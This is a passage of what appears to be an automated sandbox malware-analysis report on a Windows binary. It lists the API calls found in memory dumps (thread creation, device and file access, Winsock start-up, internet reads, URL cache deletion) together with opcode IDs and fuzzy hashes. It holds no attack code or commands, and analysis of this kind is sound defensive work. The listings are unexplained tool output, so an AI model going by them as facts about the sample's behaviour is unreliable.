                                                                                  • API ID: __msize_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1288803200-0
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0046FF66
                                                                                  • __getptd.LIBCMT ref: 0046FF7F
                                                                                  • CreateThread.KERNEL32(00000000,?,?,0046FEB2,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0046FFB7
                                                                                  • __dosmaperr.LIBCMT ref: 0046FFD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateThread___set_flsgetvalue__dosmaperr__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 1707747371-0
                                                                                  APIs
                                                                                  • SEVI.A2F0JLEKS(004A3178,004A8494,0000006F), ref: 0040A193
                                                                                  • _malloc.LIBCMT ref: 0040A19B
                                                                                  • GDTAN.A2F0JLEKS(00000000,00000000), ref: 0040A1C9
                                                                                  • _memset.LIBCMT ref: 0040A1F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4137368368-0
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040BC6D
                                                                                  • _malloc.LIBCMT ref: 0040BC92
                                                                                  • CloseHandle.KERNEL32(000000FF,00000000), ref: 0040BCA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1023042539-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite_memset_strlen_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3822394006-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0040BA88
                                                                                    • Part of subcall function 0040B300: WSAStartup.WS2_32(?,00000202,?), ref: 0040B358
                                                                                    • Part of subcall function 0040B300: __strlwr.LIBCMT ref: 0040B383
                                                                                  • _memset.LIBCMT ref: 0040BAB4
                                                                                  • _strlen.LIBCMT ref: 0040BAC3
                                                                                  • _strlen.LIBCMT ref: 0040BAE9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strlen$Startup__strlwr
                                                                                  • String ID:
                                                                                  • API String ID: 1643724437-0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: F
                                                                                  • API String ID: 2102423945-1304234792
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: P
                                                                                  • API String ID: 2102423945-3110715001
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID: u(D
                                                                                  • API String ID: 1579825452-2174179466
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000000), ref: 0042F634
                                                                                  • ShowWindow.USER32(?,00000005,?,?,?,?,?,?), ref: 0042F735
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID: ?7@
                                                                                  • API String ID: 1268545403-917346843
                                                                                  • Opcode ID: 8d1f17f3a2119bd407813befb5ae48325cf47bdfe96ce7cbf06e739975434adc
                                                                                  • Instruction ID: 9ce001e05f7c25cb85c81b34418281e311073d2a0965e9b3245ca6fb702ba2f0
                                                                                  • Opcode Fuzzy Hash: 8d1f17f3a2119bd407813befb5ae48325cf47bdfe96ce7cbf06e739975434adc
                                                                                  • Instruction Fuzzy Hash: 1B510775A00209AFCB04DF98D890EEEBBB5FF8C314F548569E501AB351D739A886CF64
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: vc8
                                                                                  • API String ID: 2102423945-3387903242
                                                                                  • Opcode ID: 87969fae044daf841959f631da73f503019689e2379141943e5d022dcd72ac50
                                                                                  • Instruction ID: 495631a13cb7595f835668c7758c9e683d10a27a96dccf2654daafc68e8f3d49
                                                                                  • Opcode Fuzzy Hash: 87969fae044daf841959f631da73f503019689e2379141943e5d022dcd72ac50
                                                                                  • Instruction Fuzzy Hash: 25510FF19001189BDB64DB50DC51BDEB778AB44308F0005EEE60967282EF796E88CF59
                                                                                  APIs
                                                                                  • RegEnumKeyExA.KERNEL32(?,?,?,?,00000100,00000000,00000000,00000000,00000000), ref: 00408976
                                                                                  • RegQueryValueExA.KERNEL32(?,?,NetCfgInstanceID,00000000,?,?,00000100), ref: 004089E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumQueryValue
                                                                                  • String ID: NetCfgInstanceID
                                                                                  • API String ID: 4273652603-3223525923
                                                                                  • Opcode ID: 60bc4842129b8c35e24109bc6535799e8b03e4fa34e1e552bdc3e16674a9439d
                                                                                  • Instruction ID: 25bb501c8ee22f440934b30616bae800add402fd604372c4df788b816d27371c
                                                                                  • Opcode Fuzzy Hash: 60bc4842129b8c35e24109bc6535799e8b03e4fa34e1e552bdc3e16674a9439d
                                                                                  • Instruction Fuzzy Hash: 534186709042AC9EDB21CB54CC89BDABBB89F19704F0441DD914C66281DBB95FC4CF65
                                                                                  APIs
                                                                                    • Part of subcall function 6A6F2FBC: GetModuleHandleA.KERNEL32(KERNEL32,6A6F30D6,?,?), ref: 6A6F2FCA
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6A6F2FEB
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6A6F2FFD
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6A6F300F
                                                                                    • Part of subcall function 6A6F2FBC: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6A6F3021
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 6A6F30F0
                                                                                  • SetLastError.KERNEL32(0000006F), ref: 6A6F3107
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                                                                                  • String ID:
                                                                                  • API String ID: 2524245154-3916222277
                                                                                  • Opcode ID: cbd7cf8dce129c45847f863d7b7b13b72717419ce8afb81778e782e6a0476d19
                                                                                  • Instruction ID: e2daf62b463ad6153f6f5519d31688bdd6b69e8e2bce8bcbc129acd7a2fff498
                                                                                  • Opcode Fuzzy Hash: cbd7cf8dce129c45847f863d7b7b13b72717419ce8afb81778e782e6a0476d19
                                                                                  • Instruction Fuzzy Hash: 77214C708002189EDB60DFB4D84CBDEB7F5BF04324F104AAAD069D6180DF749A8ADF55
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Startup__strlwr
                                                                                  • String ID: DjSsafe
                                                                                  • API String ID: 2284447004-3306479776
                                                                                  • Opcode ID: 3e7b47a98169f4fb903aa7e7ccdf235ea4870650a1a6d6f1b50e94fb8cec12be
                                                                                  • Instruction ID: 9b1c280c3fbc3eafd935c78e6036a3b33b4325c557620fda8f81a8e2950b848f
                                                                                  • Opcode Fuzzy Hash: 3e7b47a98169f4fb903aa7e7ccdf235ea4870650a1a6d6f1b50e94fb8cec12be
                                                                                  • Instruction Fuzzy Hash: D221D870A042489FDB10DB24CC56BDE7BB89F16304F0441EDE64CAB282E7795B85CBA7
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 6A6EF822
                                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 6A6EF838
                                                                                    • Part of subcall function 6A6EF58B: __EH_prolog3_GS.LIBCMT ref: 6A6EF595
                                                                                    • Part of subcall function 6A6EF58B: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,6A6EF85C,?,?), ref: 6A6EF5C5
                                                                                    • Part of subcall function 6A6EF58B: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6A6EF5D9
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF615
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF623
                                                                                    • Part of subcall function 6A6EF58B: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6A6EF640
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF66B
                                                                                    • Part of subcall function 6A6EF58B: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6A6EF674
                                                                                    • Part of subcall function 6A6EF58B: GetModuleFileNameA.KERNEL32(6A6D0000,?,00000105), ref: 6A6EF729
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                  • String ID: %s%s.dll
                                                                                  • API String ID: 1311856149-1649984862
                                                                                  • Opcode ID: 1c7bd06e26e36d0302910d0bb4088019f116c70a7e24de836b7154b6ceebf26c
                                                                                  • Instruction ID: b04dcd499b10e0ce4af8b572cc6ffd21cc05367d93f5b7c976fc64ad14d804e6
                                                                                  • Opcode Fuzzy Hash: 1c7bd06e26e36d0302910d0bb4088019f116c70a7e24de836b7154b6ceebf26c
                                                                                  • Instruction Fuzzy Hash: 3E016D71605158ABCB15DB68DD45AEB77FCBF4AB04F0504A5E506E7141DA709E048BA0
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PowerChange,00000000,00000003,00000000,00000003,00000080,00000000,6A6D18D5), ref: 6A6E2AF6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E2B12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: \\.\PowerChange
                                                                                  • API String ID: 3498533004-3103612388
                                                                                  • Opcode ID: bfd05043d4fcdf21b26ed678b93c856830ec02764f6318e1da7cbfd1b3014044
                                                                                  • Instruction ID: 2878fe75f7eaf4180bf403057b77152cfd1ecfa7afdfc268bf32bae8c16213a6
                                                                                  • Opcode Fuzzy Hash: bfd05043d4fcdf21b26ed678b93c856830ec02764f6318e1da7cbfd1b3014044
                                                                                  • Instruction Fuzzy Hash: CBD0C9703CB241B2FD7105788D2BF45219EB706B15FA006A0B622F95C09ED55A494904
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PowerChange,00000000,00000003,00000000,00000003,00000080,00000000,6A6D18D5), ref: 6A6E2AF6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E2B12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: \\.\PowerChange
                                                                                  • API String ID: 3498533004-3103612388
                                                                                  • Opcode ID: 36305ad77bd1b875c30406aa14e59a21d0a7596216e9d906d5ff179ff632fa4b
                                                                                  • Instruction ID: 772cdc43d1144f1ce71f2f4d1dcbfb7d2f4aabd965fd7f91f1f427d5f5242838
                                                                                  • Opcode Fuzzy Hash: 36305ad77bd1b875c30406aa14e59a21d0a7596216e9d906d5ff179ff632fa4b
                                                                                  • Instruction Fuzzy Hash: CED0A770245341AAEE2516348E1FF40B69DBB03714F5447E5B511FA0D2D7A459488944
                                                                                  APIs
                                                                                  • FindFirstUrlCacheEntryA.WININET(?,00000000,00000000,00000000,004A5150), ref: 0040A3BA
                                                                                  • DeleteUrlCacheEntry.WININET(?,?,?,00000000,00000000,00000000), ref: 0040A3F8
                                                                                  • FindNextUrlCacheEntryA.WININET(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0040A40F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CacheEntry$Find$DeleteFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 1671618332-0
                                                                                  • Opcode ID: b397d3ea5c834a6be8775aa0cde3b0283fe63e3f3cbab400804fdce79be67614
                                                                                  • Instruction ID: 52b86d61c30880ceb6cdf9b80abca1666db05e4f08a02f18bbf1a4d64cc4fc88
                                                                                  • Opcode Fuzzy Hash: b397d3ea5c834a6be8775aa0cde3b0283fe63e3f3cbab400804fdce79be67614
                                                                                  • Instruction Fuzzy Hash: 07410DB1D10209AFDB04DBA4C986FEFB7B8EF48704F204219F515B7281D779AA05CBA5
                                                                                  APIs
                                                                                  • InternetReadFile.WININET(?,?,?,?,?), ref: 0044BE58
                                                                                    • Part of subcall function 0044B996: __EH_prolog3.LIBCMT ref: 0044B99D
                                                                                  • _memset.LIBCMT ref: 0044BED2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileH_prolog3InternetRead_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2946029256-0
                                                                                  • Opcode ID: 95cbd30d01359a4a34f8b0acb229894c011b7fa46d8c71f1875a4e07254a5c1b
                                                                                  • Instruction ID: ebc7df274186f541ff6877d53449bc54c43384d211bc78e8768696c573c92585
                                                                                  • Opcode Fuzzy Hash: 95cbd30d01359a4a34f8b0acb229894c011b7fa46d8c71f1875a4e07254a5c1b
                                                                                  • Instruction Fuzzy Hash: 2421AE31100A40ABEB71DF25CE81B97BBF9FF80304F54581AE68286A61D375F854CB94
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 1975251954-0
                                                                                  • Opcode ID: eb48f75c9c828d19f7f82149db90c7579b2714b87fdc16766e68dc9b241f72e6
                                                                                  • Instruction ID: ca9936ac93ab54a64ad8a0f8cee0fd065c5e47018f666c2a9947ffe2336715b6
                                                                                  • Opcode Fuzzy Hash: eb48f75c9c828d19f7f82149db90c7579b2714b87fdc16766e68dc9b241f72e6
                                                                                  • Instruction Fuzzy Hash: 622194B1D0020CEBCB10DB94DD46BDDB778AB58308F1445D9E504A7282EBB9AF89CF95
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc_memset_sprintf_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3423381085-0
                                                                                  • Opcode ID: c256f238be2ceeb92c75f2fbf6856b8875e1761a2a9a66ae50ed1448295aee7e
                                                                                  • Instruction ID: a3c4378de8374e7ec5d76158ced12fb686b181e1f3b831a36acc6cab5ac9a0de
                                                                                  • Opcode Fuzzy Hash: c256f238be2ceeb92c75f2fbf6856b8875e1761a2a9a66ae50ed1448295aee7e
                                                                                  • Instruction Fuzzy Hash: 7F21A9B2504201ABC324DF28C888A97BBE4BF8A744F014929E548C7240EF31F948CBE5
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,0049EA78,0000000C,00472D2E,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80), ref: 0046A91A
                                                                                    • Part of subcall function 00476312: __mtinitlocknum.LIBCMT ref: 00476328
                                                                                    • Part of subcall function 00476312: __amsg_exit.LIBCMT ref: 00476334
                                                                                  • ___sbh_find_block.LIBCMT ref: 0046A8DA
                                                                                  • ___sbh_free_block.LIBCMT ref: 0046A8E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeHeap___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 3132717848-0
                                                                                  • Opcode ID: ff0f6c8d1285e46660d1b8bce900bc90798cdcdca3b7363f068bbd1994c2452d
                                                                                  • Instruction ID: f04565eebed0a9506ea07e7e13c6955fc022d4e191335730864cec16c62f9766
                                                                                  • Opcode Fuzzy Hash: ff0f6c8d1285e46660d1b8bce900bc90798cdcdca3b7363f068bbd1994c2452d
                                                                                  • Instruction Fuzzy Hash: 3801DF71801A01B9DF206B629806B5A26749F01324F31482FF808761A2EE3C99548E9F
                                                                                  APIs
                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004307E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                  • String ID:
